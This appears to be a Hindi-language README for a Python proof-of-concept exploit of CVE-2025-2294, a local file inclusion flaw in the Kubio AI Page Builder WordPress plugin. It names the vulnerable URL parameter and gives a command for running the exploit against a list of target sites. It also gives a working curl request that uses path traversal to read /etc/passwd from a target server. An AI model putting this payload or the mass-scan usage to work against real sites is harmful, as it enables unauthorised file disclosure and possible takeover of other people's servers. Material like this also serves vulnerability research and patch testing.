
# CVE-2025-2294 के लिए Python PoC Kubio AI Page Builder WordPress प्लगइन (≤2.5.1) में एक बिना प्रमाणीकरण वाला Local File Inclusion, जो मनमाने फ़ाइल प्रकटीकरण और संभावित रिमोट कोड निष्पादन को प्रदर्शित करता है।
CVE-2025-2294 एक गंभीर 🔥 स्थानीय फ़ाइल समावेशन (LFI) भेद्यता है जो WordPress के लिए Kubio AI Page Builder प्लगइन (संस्करण 2.5.1 तक और सहित) को प्रभावित करती है। यह दोष अनधिकृत दूरस्थ हमलावरों 👾 को __kubio-site-edit-iframe-classic-template URL पैरामीटर के माध्यम से सर्वर पर मनमानी फ़ाइलों को शामिल करने की अनुमति देता है।
इस भेद्यता का शोषण करने से संवेदनशील फ़ाइलों का खुलासा 📂, दूरस्थ कोड निष्पादन 💥, और पूर्ण सिस्टम समझौता 💀 हो सकता है।
Muhammad Nizar — सुरक्षा शोधकर्ता 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
प्रश्नों या सहयोग के लिए बेझिझक संपर्क करें! 🤝
एक्सप्लॉइट स्क्रिप्ट को लक्ष्य URLs की सूची के साथ चलाएँ:
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"